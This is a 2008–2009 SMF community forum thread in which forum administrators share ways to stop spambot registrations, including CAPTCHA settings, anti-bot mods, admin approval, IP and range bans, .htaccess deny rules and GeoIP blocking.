Quote from: BurkeKnight on December 01, 2008, 10:40:18 PM
On all my sites, the first board is always News & Announcements. Only staff can post there, read only to regular members. So there may very well be something to this, as I have not gotten spam posts on my forums. Yet I do have a few new members that either don't post, or don't activate.

We'll probably be the next ones to get hit, though. It won't take the spammers long to adjust.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: mashby on December 01, 2008, 11:02:51 PM
It will take them quite a bit to adjust to custom questions/answers.
http://custom.simplemachines.org/mods/index.php?mod=1516

In fact, I doubt they'll be able to do it. reCAPCHA is also another great solution. SMF2.0 will have it built-in (when it's released).
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: auss9960 on December 02, 2008, 12:50:46 AM
I don't know if this is related to the spambots, but I have lost the visual verification image on my forum for private messages of ordinary members. This is preventing them from posting anything. I installed the captcha mod and the situation did not improve. Any ideas how to get it back? Desperate...

Paul
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: maniakaz on December 04, 2008, 04:13:51 AM
Used 1.15 and was flooded with spam. Updated to 1.17  - less spam, but still some "levitra viagra porntube" bots managed to register. Switched to manual approval, since my forum is very small and now I live in peace. Some bots are trying to register and end with pre-Christmas ban.
I am banning not a single IP, but entire range if that range is suspicious. If that is German telecom or huge ISP from a country from my interest, I ban one IP only. So far, it managed to work: lots of "access denied by server" logs.
I will try to find someone to install a mod for me (since I am so incompetent that cannot do it myself) that asks some questions.  Besides, increasing captcha level does not help a lot.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Dougster on December 04, 2008, 04:48:12 AM
I had been hit with the same group and got their i.p. address and company name.

The way to combat it is to go into admin center>settings>registration>members activation (means a live person has to activate and makes it hard for bots)

captcha difficulty: high (makes it harder for bots)

password difficulty strength:high (means it has to be hard to guess)

I did this and have not had a single porno spammer since.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on December 04, 2008, 06:22:52 AM
A lot of people have had spam members by using captcha difficulty:medium, so that's not good enough anymore.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: tourneymanager on December 04, 2008, 07:55:20 PM
Quote from: tourneymanager on December 01, 2008, 10:52:22 PM
Quote from: BurkeKnight on December 01, 2008, 10:40:18 PM
On all my sites, the first board is always News & Announcements. Only staff can post there, read only to regular members. So there may very well be something to this, as I have not gotten spam posts on my forums. Yet I do have a few new members that either don't post, or don't activate.

I guess I was right. Just got hit with my first spam post. Luckily, I was online when it happened and nuked the message and the user instantly. Just installed the "Are you human" mod. Hope it helps...

We'll probably be the next ones to get hit, though. It won't take the spammers long to adjust.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on December 05, 2008, 06:42:33 AM
I'm currently working on a new captcha test that will make it more difficult for spammer software to get through.
I don't know if I will make it to a mod as I have no idea on how to do that.

But if you are interested or just like to comment on the idea and the sequrity around it, please visit http://www.simplemachines.org/community/index.php?topic=278017.0
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: lax.slash on December 05, 2008, 09:11:49 AM
Wow. I just got hit. Blocked triggers:

78.110.175.*
ool-4577f891.dyn.optonline.net


7 SPAM Bots, 1 post. No protection, new forum (Forum is 2 days old). Mambo bridge, SMF 1.1.7.  Some email addresses from *@yahoo.co.uk, and some from *@gmail.com.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: abdaweb on December 05, 2008, 09:10:31 PM
I run 2 forums where the server stats show there are a continual stream of spambot views. Yet I have no problem with spam because of 2 mods I have installed.

One is the Custom Profile Field mod  that others have referred to. Both forums are in a sense closed ones in that only members of the respective oganisations are allowed to register, even though there are thousands of these. But a requirement via an extra field of a Club name in one case and a member number in another means that I have never experienced a spam registration attempt. If they did, we can quickly check validity before approving the registration.

But in one board on one forum, I want to allow guests to make posts. This is because handling their free enquiries is a way of getting them to join the orgainisation as well as providing a public service.

After going down the time wasting banning routine, I installed the No Spam by Guests mod.  I can't see any posts in this thread about this mod, yet it is simple and brilliant. It just requres one to update the script for 1.1.7 since the mod is only up to 1.1.4. In essence, all it does is prevent any post that contains "www" in it, an essential part of every spam posting that contains a link. It has its own error message that it returns to the poster.

Another big advantage of the mod, when compared to banning, is that it doesn't fill up your error and ban logs with pages of error messages relating to spam attempts. I have now been able to remove 4 pages of ban listings and no longer have any spam posts even though I openly allow guest posting.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: jrstark on December 06, 2008, 01:15:40 AM
Got my first spam signup while I was upgrading from 1.1.2 to 1.1.7, on Dec. 4.  I have my forum set to member approval, when I approve new members I require activation.  I approved the first spambot, but he never activated.  Have since deleted him.  Only have a handful that have tried to register (including at least one from internetserverteam).  I do see a few "Your account is still awaiting admin approval." error messages.  After reading this thread I moved CAPCHA from medium to high and added age restriction.

I don't know if this is related, but something has crashed my sessions table twice recently, that is why I upgraded.  Both times it was a major crash, forum shows can't connect error and I can't even log in to phpmyadmin.  My host had to recreate the sessions table both times, then I was able to fix the other crash errors.


Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: TheDisturbedOne on December 06, 2008, 11:18:32 AM
I laughed when I got my first one a few days ago.  He found out how to add p0rn links to his profile, but could figure out how to post!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on December 06, 2008, 11:39:30 AM
I actually had one join one of my sites.
He could not post, as the posts were moderated.
So I kept deleting his spam posts.
He then emailed me through the contact form, complaining that his posts did not show up...LOL
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on December 06, 2008, 11:40:10 AM
I noticed a new form of spam attack on the forum today that was very hard to notice. I have reCAPTCHA installed but the spam still got through.

It took random sentences from a thread and recompiled it into a new post on that thread (including spelling mistakes). This made the post look like it fit the context of the thread perfectly. What cued me in were the unusual links in the signature so I took a more careful look. This can be easily scripted as a bot!

Unfortunately there are people that ramble on as much as spam scripts in my forum so I only see these intelligent spam bots getting harder to detect.

It fit the spec of other spammers, using a gmail account and the signature/profile for spam links. It was not a .ru host like usual however . . . The spam links were professional looking google blogspot websites. It appears google is now worse than mail.ru for spam distribution!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: lax.slash on December 06, 2008, 06:31:35 PM
Quote from: societyofrobots on December 06, 2008, 11:40:10 AM
I noticed a new form of spam attack on the forum today that was very hard to notice. I have reCAPTCHA installed but the spam still got through.

It took random sentences from a thread and recompiled it into a new post on that thread (including spelling mistakes). This made the post look like it fit the context of the thread perfectly. What cued me in were the unusual links in the signature so I took a more careful look. This can be easily scripted as a bot!

Unfortunately there are people that ramble on as much as spam scripts in my forum so I only see these intelligent spam bots getting harder to detect.

It fit the spec of other spammers, using a gmail account and the signature/profile for spam links. It was not a .ru host like usual however . . . The spam links were professional looking google blogspot websites. It appears google is now worse than mail.ru for spam distribution!

Wow, that's some SPAMBot. Never heard of one doing that.

Try creating a ban trigger based on the IP.  Use the first 3 parts of the IP address, and then put a star for the last part. Like 12.345.678.* The * is a wildcard. Also, try banning by host name.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Chucky on December 14, 2008, 02:39:50 AM
How can we hide the version when we're not allowed to? It is a part of the copyright notice that we're not allowed to remove, right?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: JimM on December 14, 2008, 02:46:30 AM
@ Chucky - use this mod Hide SMF Version (http://custom.simplemachines.org/mods/index.php?mod=1046)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Chucky on December 14, 2008, 07:53:07 AM
I installed it, says it installed correctly but even after I log out I can still see the SMF version... I am running in classic theme, is that why?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on December 14, 2008, 12:06:27 PM
You need to enable the removal of the version number, it isn't automatic. Read the mod description for where to find that setting.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Amacythe on December 14, 2008, 12:46:45 PM
I'd like to remind everyone about an unfortunate incident we had here a while back.
http://www.simplemachines.org/community/index.php?topic=251788.0

It isn't *just* about the spam they're posting to your site, but how they can use your site to house the spam they post on other sites.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: susb on December 22, 2008, 06:49:36 PM
I ended up having to ban via .htaccess - it was not just an issue of spam (I already utilize the registration methods mentioned in this thread, including Custom Profile Field Mod) but every hit has multiple DB queries and they were overwhelming our shared database  :-\

77.88.26.25 hit my forum over 160,000 times in a two month period.  I banned them in .htaccess and finally they gave up and went elsewhere.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: mixedcouples on December 29, 2008, 11:30:19 PM
I've read many pages here about these spambots and I still have a question.  I've been dealing with a spammer, so I warned him and I did a full ban on him with SMF 1.1.7.  For the last 3 days he continually tries to log-in every couple minutes from the same IP address and it has added up to thousands of hits on the ban list and error pages.  Is there a way to stop this idiot from doing this?  Would this be an .htaccess solution?  Please let me know.

His information is:

email address:  [email protected]
hostname:  n207.cpms.ru
IP address: 87.236.29.207
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on December 29, 2008, 11:38:47 PM
You could do an IP ban at the server level if you wanted. If it's always the same IP, then it is certainly the right situation for such a thing. However, do remove it after some time to see if you still need to keep it blocked. It's a bad thing to keep stale bans/blocks in place (you tend to forget what they are for).

The code you'd want would be something like:


Order Deny, Allow
Allow from ALL
Deny from 0.0.0.0


Replace 0.0.0.0 with the IP you wish to block. You can add a comment at the end of the deny line if that will help you remember. Simply space out a few times, type "#" and then add your comment after it. Keep it on one line only.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: mixedcouples on December 29, 2008, 11:51:57 PM
Many thanks.  I found a way to do it with cPanel... an IP Deny Manager.  I think that idiot may be gone at last!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: susb on December 30, 2008, 12:13:34 AM
order allow,deny

deny from 77.88.26.25

allow from all
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: kopchev on January 04, 2009, 09:03:26 AM
I've run SMF since april 2007 and till november have had no bot registration. Since november 2008  lots of bots have tried to register and some of them - successfully. They use .ru or gmail account. I successfully solved this problem by setting the captcha difficulty level to maximum. Bots now cannot register.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Rozza1 on January 04, 2009, 05:25:05 PM
I have solved the spambot problem but Google has detected malware on the site and is coming up with a warning when people try to access the forum.

How do i remove this malware?

Regards


Ross Warren
www.horrorwriters.net/forum
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on January 04, 2009, 05:41:11 PM
Check the report on Google's SafeBrowsing site: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.horrorwriters.net/forum

It seems someone managed to insert some code in your site, perhaps through some other other software on your site, or via an old copy of SMF. You'll need to look through all the files you have and clean them up, or replace all the files on your site with clean copies.

Be aware that many attacks toss up shell scripts in many areas, so you need to either check all files or delete them all before restoring.

If you need additional help, start a new topic.

It seems you started a topic: [[Programs for removing malware]]. Help will continue there. Continued posts on your issue on this topic will be deleted.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: orange on January 04, 2009, 07:05:23 PM
I've recently started getting lots of guest-posted spam ... is it possible in 1.1.7 to turn on the CAPTCHA when you make a post as a guest? The CAPTCHA is there when registering a new account but is it possible to add it to the posting screen for guests too?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on January 04, 2009, 09:02:10 PM
Did you try Visual Verification Options (http://custom.simplemachines.org/mods/index.php?mod=734)?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 3ps on January 06, 2009, 08:22:41 AM
Hi,

I am using the Joomla-SMF bridge. People register on the Joomla site and it automatically creates an SMF user. I have set an age restriction but I am still getting spam postings.

I want to try some of the suggestions mentioned at the start of this thread, but don't they all apply to SMF only? If my users register via Joomla then surely the SMF steps will be bypassed?

Any suggestions appreciated as I am thinking of closing my site as I can't keep up with clearing out the spam.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrPhil on January 06, 2009, 08:38:35 AM
Quote from: 3ps on January 06, 2009, 08:22:41 AM
I have set an age restriction but I am still getting spam postings.

There's nothing magical about an age restriction. It's simply another question to answer, and if it's not in the spambot's canned response to the registration, the registration will fail. Once the spammer figures out what's being asked, the age restriction will not help at all.

"Are you human?" type anti-spam mods can choose from a variety of questions in different formats (fill-in text, radio button, checkbox, etc.) to confuse spambots, by not having a fixed number of input fields with fixed input types. Of course, spammers could counter with more sophisticated spambots that understand the prompts and data types wanted, and the arms race continues... or they can just hire a bunch of third world people to sit in front of a screen all day and register on forums.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on January 14, 2009, 08:00:22 AM
A spammer bot finally got through all my latest defenses.

I'm using reCAPTCHA for SMF 1.1.7. It was the typical bot account, with a random string for a password, and the email address had a .net.nz ending. The url traced to AU.

It didn't get through email validation however, but I'm shocked it got past reCAPTCHA. I honestly thought it would take one or two years before they beat it . . .

Any chance can someone make the Anti-Spam Verification Questions mod work with the reCAPTCHA mod?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on January 14, 2009, 11:10:27 AM
Quote from: societyofrobots on January 14, 2009, 08:00:22 AM
It didn't get through email validation however, but I'm shocked it got past reCAPTCHA. I honestly thought it would take one or two years before they beat it . . .

More than likely, a real human did that part. There are services for spammers where one can pay for having people in rather poor countries solve verification images. It's not that common since it's still an extra expense on the spammer.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: vmgamer on January 22, 2009, 07:15:54 AM
Waow...
the bot filling my forum with xxx posts

now i use anti spam verification question, and it works well
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: KirkhamsEbooks on January 23, 2009, 02:25:47 AM
Quote from: mouse92im on November 11, 2008, 10:13:07 PM
Adding an age restriction seems to have helped as well.  I haven't seen any new member requests since.

How do you add the age restriction?

Rick
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ModelBoatMayhem on January 23, 2009, 03:48:06 AM

I've had another wave of attacks / registration attempts this week.
I've now created a ban trigger on @mail.ru
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: kat on January 23, 2009, 06:15:06 AM
Quote from: KirkhamsEbooks on January 23, 2009, 02:25:47 AM

How do you add the age restriction?

Rick

Admin>Registration>Settings, oddly enough.

I have a trigger ban on gmail, too.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Miller Time on January 23, 2009, 08:09:10 AM
I'd really hate to block legitimate gmail users, most of our group uses it a a primary.

On another note, I'd prefer to be able to perform a one-click ban of the entire RIPE network.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on January 23, 2009, 11:13:24 AM
Quote from: Miller Time on January 23, 2009, 08:09:10 AM
On another note, I'd prefer to be able to perform a one-click ban of the entire RIPE network.

If you want to block all of Europe, you can certainly try. A quick query of their WHOIS info will give you this: RS-IP-ALLOCATIONS-TO-RIPE-NCC-FROM-IANA (http://www.db.ripe.net/whois?-rTroute-set%2BRS-IP-ALLOCATIONS-TO-RIPE-NCC-FROM-IANA). As the text there says, those are all expressed in CIDR, not as /8 blocks. This makes a difference depending on what you are using to ban.

If you want to block everything outside North America, you'll also need to track down assignments to LACNIC, APNIC, and AfriNIC.

Of course, as assignments do sometimes vary and change quicker than db updates, you'll probably wind up blocking some of the visitors you want, but that's the risk you take when you start blocking whole regions.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: KirkhamsEbooks on January 23, 2009, 12:19:07 PM
Quote from: Kat on January 23, 2009, 06:15:06 AM
Quote from: KirkhamsEbooks on January 23, 2009, 02:25:47 AM

How do you add the age restriction?

Rick

Admin>Registration>Settings, oddly enough.

I have a trigger ban on gmail, too.

I've considered blocking gmail, but a lot of people are using it thus that is where a lot of the spam comes from. I don't think it's just a gmail thing

Rick
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Miller Time on January 23, 2009, 12:21:06 PM
Quote from: Motoko-chan on January 23, 2009, 11:13:24 AM
Quote from: Miller Time on January 23, 2009, 08:09:10 AM
On another note, I'd prefer to be able to perform a one-click ban of the entire RIPE network.

If you want to block all of Europe, you can certainly try. A quick query of their WHOIS info will give you this: RS-IP-ALLOCATIONS-TO-RIPE-NCC-FROM-IANA (http://www.db.ripe.net/whois?-rTroute-set%2BRS-IP-ALLOCATIONS-TO-RIPE-NCC-FROM-IANA). As the text there says, those are all expressed in CIDR, not as /8 blocks. This makes a difference depending on what you are using to ban.

If you want to block everything outside North America, you'll also need to track down assignments to LACNIC, APNIC, and AfriNIC.

Of course, as assignments do sometimes vary and change quicker than db updates, you'll probably wind up blocking some of the visitors you want, but that's the risk you take when you start blocking whole regions.

Yeah, I've just started to put in ip bans using the first octet of any spammers registering from RIPE. For my forum it works fine since it's a local group, and 100% of the spammers are from RIPE while not one legitimate user is. Even on a low traffic forum we get 15-20 hits a day per IP range. Not an SMF issue of course   ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on January 24, 2009, 04:12:23 AM
A great article I just found on CAPTCHA. It also lists other forms of CAPTCHA software that should be incorporated into SMF:
http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=Security&articleId=9126378&taxonomyId=17&pageNumber=1

As long as we all use the same defense (ie reCAPTCHA), we all fall at the same time ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: smonk on February 02, 2009, 10:40:06 AM
we had 10 or 12 of these guys registering every day.  they got hung up in the email activation process, but it was still a pain in the backside to clean up every day.

we installed Anti-Spam Verification Questions for SMF 1.1.7 on Friday, and it stopped them dead in their tracks.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: eddyT1961 on February 02, 2009, 11:07:24 AM
I put alot of hours into my forum only to have it invaded by these inconsiderate so and so's.
Is there a way to organize a nation-wide lynch mob against these nasty spam-bot programmers...
...Oh c'mon, just a little mob?

I'm a big strong guy...never been accused of hurting anyone that didn't deserve it... So I was thinking maybe I could just introduce myself and pretend to want to shake their hand. Then I could crush the bones in their little programming fingers, and then run back to my car before they could call the police. What do you think guys?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: KirkhamsEbooks on February 02, 2009, 12:21:47 PM
I was originally going to write an article on 10 uses for pedofiles and child abusers in the dojo (martial art training area) but I could make it for spammers instead

Rick
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: animeboy on February 05, 2009, 03:30:24 PM
I read through this and didn't see this mentioned.  It won't be applicable for everyone, but if your running a regional or even countrywide type of forum, it will help some, and it's not specific to SMF.

There's a httpd module for apache called mod_GeoIP that lets you allow/deny whole country ranges of IP's.  I've setup my 2 forums to just allow US and Cananda and that pretty effectively stopped 99.99 of the spam bots at the apache level.

If you have access at this level (I know not everyone does).
It's a simple:
yum install mod_GeoIP 
for RHEL, CentOS, Fedora.  There's a apt get for ubuntu as well...

From there it's a modification of the httpd.conf and the allow,deny blocks for the root of your server, or virtual hosts.


Mark
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrMike on February 05, 2009, 03:32:01 PM
I run about 50 forums and have spambot / regbot problems too. I ended up writing a mod and creating a site specifically to help stop bots. I mentioned this in another post, but I'll mention it here as well if you don't mind.  The site is http://BotScout.com (http://botscout.com).

There's a plugin for SMF as well as sample code to use in other forms or to develop your own mods or plugins with.

I'm undoubtably biased, but it's cut my spambot/regbot problems down to almost nothing. And the database of bots just keeps growing- it hit 95,000 unique bot signatures a couple days ago.

It's all free. Give it a try if you want.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: cruisearound.ie on February 06, 2009, 11:02:12 AM
I have the 3 of these on my forum which u must cmplete before registering and havent been hit yet!

Anti-Spam Verification Questions


Anti-Bot Registration Puzzles


Are You Human? (Anti-Bot Check)

Thanks for the warning
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: distoria on February 06, 2009, 07:13:17 PM
does the new 1.1.8 release fix the spammers?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on February 06, 2009, 07:17:07 PM
Nothing can fix the spammers, as some of them are human registering accounts.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on February 06, 2009, 11:10:08 PM
If someone's interested, they can take a look at this beta mod, download it and try it out: http://www.simplemachines.org/community/index.php?topic=280188.0

Note: The images in the first post are rather old. The look has changed a lot.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: GusVeness on February 07, 2009, 06:08:18 PM
Hi,
I'm new to all this so please forgive my naivety.  I contracted with an individual to build my site. After building the site and getting it running, she disappeared. I'm quite happy with her work, but am getting overwhelmed with spam posts. I've muddled through and worked out how to delete and ban the offenders, but they still get through. I updated to version 1.1.8 but to no avail. Can anyone offer some suggestions?

Thanks
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: sbroadbent on February 07, 2009, 08:46:29 PM
Quote from: Deprecated on November 12, 2008, 12:07:15 AM
And as to your other question: Well... if all else fails, just delete anybody you aren't sure about, and hope if they are real people they will try again.

Or email them and ask them about their registration. How many bots reply to questions via email? (Maybe a few, but this should help you.)

My attempts at containing the spam has been limited to creating a member group with no posting priveleges, and manually moving new registrations to that member group, with a private message indicating if they want posting privileges to contact me.  This method did allow me to verify one legitimate user, but is time consuming.  I do have the forum send me email whenever a new user registers.

Personally I would just like to have all new users set by default to have any posts sent to a moderation queue and require approval before the post shows up.

While it would not prevent spam bots from registering, at least their spam would not show up.

I had also been banning spam bots by hostname, and IP addresses, and I did notice that several users were automatically banned with me needing to do anything more.  That unfortunately has been few.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on February 07, 2009, 09:07:22 PM
You shouldn't even get spam bots into your forum. Raise the sequrity level, or install additional spambot verification software.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Clara Listensprechen on February 12, 2009, 12:14:26 AM
Quote from: GusVeness on February 07, 2009, 06:08:18 PM
Hi,
I'm new to all this so please forgive my naivety.  I contracted with an individual to build my site. After building the site and getting it running, she disappeared. I'm quite happy with her work, but am getting overwhelmed with spam posts. I've muddled through and worked out how to delete and ban the offenders, but they still get through. I updated to version 1.1.8 but to no avail. Can anyone offer some suggestions?

Thanks

I'm fairly new to the ins and outs of Simple Machines forum software myself, but I have found a couple of simple measures to be effective (so far).  There is a mod somewhere on this board that permits you to set up a special Members category that will apply to all registrants when you select that option in the Admin center. It's a package called "Default Membergroup on Registration", and I set this up as a Restricted member group that can post only in one area and placed this area at the very bottom of the forum.  Only Restricted Members and Guests can access it.

I posted board rules down there and an Introductions section, and so far none of the spammers have shown interest in even posting spam down there. New registrations are down, but I'll have to admit that since I've started tracking them, I've noticed that if they're not total bots, their invasion attempts are at least semi-automated. 

On a totally different (non-SM board) that uses ReCaptcha, some spammers do get through.  I can confirm that they're humans; when I change Permissions By Boards periodically, I note in the Forum Error Log that this confuses the heck out of their automation, ha. Some of the error messages indicate a fairly sophisticated level of automation, but these same guys will manually attempt to engage the Help area--for troubleshooting, I guess.

I run only one board, though, and those who run...what, FIFTY boards?!?!...might find this to be still too labor-intensive.  I have also had success with IP bannings using wildcards but using WHOIS readouts on specific server ranges to ban just the servers.  Somebody originating at 194.8.X.X has been observed using different IP addresses but not outside the server's range of 194.8.0.0 - 194.8.255.255...therefore in banning the server I've banned a whole passel of retries without banning possible legit people.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Clara Listensprechen on February 12, 2009, 12:21:55 AM
Quote from: sbroadbent on February 07, 2009, 08:46:29 PM
Quote from: Deprecated on November 12, 2008, 12:07:15 AM
And as to your other question: Well... if all else fails, just delete anybody you aren't sure about, and hope if they are real people they will try again.

Or email them and ask them about their registration. How many bots reply to questions via email? (Maybe a few, but this should help you.)

My attempts at containing the spam has been limited to creating a member group with no posting priveleges, and manually moving new registrations to that member group, with a private message indicating if they want posting privileges to contact me.  This method did allow me to verify one legitimate user, but is time consuming.  I do have the forum send me email whenever a new user registers.

Personally I would just like to have all new users set by default to have any posts sent to a moderation queue and require approval before the post shows up.

While it would not prevent spam bots from registering, at least their spam would not show up.

I had also been banning spam bots by hostname, and IP addresses, and I did notice that several users were automatically banned with me needing to do anything more.  That unfortunately has been few.

This was the suggestion that I followed when I set up the special forum area for Restricted membergroup and Guests, except that I didn't deny the ability to post and it's done automatically using the Registration mod I mentioned (not manually). 

I did things this way mainly because I wanted to later add their IP (server ranges) to the ban list having an excuse to do that.  Regular members don't have access to the area.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: angiexx1 on February 12, 2009, 09:41:33 AM
I have one thats applied to my forum yesturday he is sat in pending and will stay there, cant try again with his email address that way, am lucky its a small forum so can cope with that at the moment.

Am bit confused though as whois by the look of it puts address as au is that australia

while botscout has him/her or IT as china

heres some links

http://tools.whois.net/index.php?fuseaction=whois.whoisbyipresults

http://www.botscout.com/ipcheck.htm?ip=221.6.182.50

email he has used is [email protected]
Username daryy

he is the only one that has tried registering on my forum at all, had one trying to look in the forum but have the look n cant see mod guests can see catagory and boards cant read the posts etc

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Clara Listensprechen on February 12, 2009, 11:57:19 AM
NOW I can use those links--as of today, my aforementioned strategy failed and got one that hacked in. Posted as if registered and display said he was both a restricted member and a regular member, AND did not appear on the registered member list.

With hackers like this, you can set up your board for Admin approval all you want to and they'll still get in.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on February 12, 2009, 12:03:29 PM
Quote from: angiexx1 on February 12, 2009, 09:41:33 AM
I have one thats applied to my forum yesturday he is sat in pending and will stay there, cant try again with his email address that way, am lucky its a small forum so can cope with that at the moment.

Am bit confused though as whois by the look of it puts address as au is that australia

while botscout has him/her or IT as china

heres some links

http://tools.whois.net/index.php?fuseaction=whois.whoisbyipresults

http://www.botscout.com/ipcheck.htm?ip=221.6.182.50

email he has used is [email protected]
Username daryy

he is the only one that has tried registering on my forum at all, had one trying to look in the forum but have the look n cant see mod guests can see catagory and boards cant read the posts etc



I got daryy in yesterday. He's a bad dude. Actually the only spammer I ever got into any of my forums for a long time. He passed my avatar verification, so the guy must be human.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: JimM on February 12, 2009, 04:51:48 PM
If you google daryy, you will see he has registered on lots of SMF forums and post one time.  He adds links in his signature.  You can ban him or just set your entry level membergroup as one that can't edit the profile until a certain number of post. 

There are times when you will have to deal with the occasional human spammer.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on February 12, 2009, 04:57:16 PM
If he got past my "unknown" anti-spam mod, then he must be human or I'm a bad programmer ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Grue67 on February 13, 2009, 10:28:45 AM
I have a pretty small forum and got hit by SpamBots.  I'm the only knowledgeable admin, so it was up to me to find them and remove them.  After increasing security and researching IP ranges to ban, I really got tired of them still showing up and registering.

Then I read about the reasons why the SpamBots are registering:  they are there to post links in their profile so that the search engine bots will see them and follow the links and give their website a higher index ranking.

I went in and disabled the options for guests to read the member list and look at member profiles.

I havent had one spam bot register now for over three months.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: angiexx1 on February 13, 2009, 11:20:53 AM
Yeay Daryy is human googled his name and came accross one post that he had done.

But I always check as much as I can before letting anyone in unless I know them as well as possible,

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on February 13, 2009, 11:34:47 AM
He's been busy:
http://www.google.dk/search?q=View+the+profile+of+daryy&num=100&hl=da&lr=&as_qdr=all&sa=2

He even registered at SM
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Oldiesmann on February 13, 2009, 11:41:27 AM
Odd... He's never posted here and hasn't even been online since he registered almost 2 1/2 months ago.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on February 13, 2009, 11:46:36 AM
I was thinking on the backup community of SMF. i didn't even check if he was in here. But the guy is no good, or he knows a lot of languages. Just take a look on all the forums he registered in.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: JimM on February 13, 2009, 03:39:25 PM
Quote from: Oldiesmann on February 13, 2009, 11:41:27 AM
Odd... He's never posted here and hasn't even been online since he registered almost 2 1/2 months ago.

Could be because he can't add his links in the signature till he posts 10 times.  I watched him close when he registered at my site because he got there by googling "Powered by SMF 1.1.7"+"game".  That was about 3 days before the 1.1.8 update was released.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: sbroadbent on February 16, 2009, 10:30:35 PM
